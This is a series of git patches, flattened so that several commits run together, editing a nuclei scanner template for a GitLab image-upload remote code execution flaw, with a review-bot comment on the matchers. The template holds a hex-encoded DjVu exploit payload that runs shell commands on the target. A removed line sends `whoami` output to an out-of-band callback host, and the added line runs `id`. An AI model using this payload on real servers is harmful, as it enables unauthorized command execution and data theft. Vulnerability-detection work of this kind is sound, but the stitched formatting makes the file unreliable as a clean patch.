From 86c55d0cbe53368fd9baac498deddf15e6f52486 Mon Sep 17 00:00:00 2001
From: "Greg Johnson (codeEmitter)"
Date: Thu, 17 Feb 2022 12:43:55 -0500
Subject: [PATCH 1/4] remove interactsh from the gitlab-rce template
---
 vulnerabilities/gitlab/gitlab-rce.yaml | 14 ++------------
 1 file changed, 2 insertions(+), 12 deletions(-)
diff --git a/vulnerabilities/gitlab/gitlab-rce.yaml b/vulnerabilities/gitlab/gitlab-rce.yaml
index ba59736e86..b1934b1588 100644
--- a/vulnerabilities/gitlab/gitlab-rce.yaml
+++ b/vulnerabilities/gitlab/gitlab-rce.yaml
@@ -29,20 +29,16 @@ requests: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5 X-CSRF-Token: {{csrf-token}} - {{hex_decode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}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}} + 
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}id{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}} cookie-reuse: true + max-redirects: 3 matchers-condition: and matchers: - type: word words: - 'Failed to process image' - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - - type: status status: - 422 
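Review bot: With the `interactsh_protocol` matcher removed, the only verdict this template can reach is the remaining `'Failed to process image'` word match ANDed with status `422`, and the new payload line runs `id` whose output is never matched anywhere, so a host that merely rejects the malformed upload with that error is reported exactly like one on which the command ran. At minimum that should be documented above `matchers-condition: and`, e.g. `# Matches only the upload-rejection message and 422; this does not confirm command execution and may false-positive on hosts that return the same error for any bad image`. The added `max-redirects: 3` stands alone, and as far as I know nuclei only honours it when `redirects: true` is also set on the request, so either add `redirects: true` beside it or drop the line (the request block itself starts above the hunk, so I cannot see whether it is set earlier). The commit message gives no reason for dropping the out-of-band confirmation, which reviewers need to judge the accuracy trade-off.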
@@ -55,9 +51,3 @@ requests: regex: - 'csrf-token" content="(.*?)" />\n\n Date: Thu, 17 Feb 2022 15:36:17 -0500 Subject: [PATCH 2/4] fix linting error --- vulnerabilities/gitlab/gitlab-rce.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/gitlab/gitlab-rce.yaml b/vulnerabilities/gitlab/gitlab-rce.yaml index b1934b1588..908240c7d6 100644 --- a/vulnerabilities/gitlab/gitlab-rce.yaml +++ b/vulnerabilities/gitlab/gitlab-rce.yaml @@ -50,4 +50,3 @@ requests: group: 1 regex: - 'csrf-token" content="(.*?)" />\n\n Date: Thu, 17 Feb 2022 16:26:19 -0500 Subject: [PATCH 3/4] new versions of gitlab do not have a blank in between the anti-csrf meta tag --- vulnerabilities/gitlab/gitlab-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/gitlab/gitlab-rce.yaml b/vulnerabilities/gitlab/gitlab-rce.yaml index 908240c7d6..2bfd6e94d1 100644 --- a/vulnerabilities/gitlab/gitlab-rce.yaml +++ b/vulnerabilities/gitlab/gitlab-rce.yaml @@ -49,4 +49,4 @@ requests: internal: true group: 1 regex: - - 'csrf-token" content="(.*?)" />\n\n'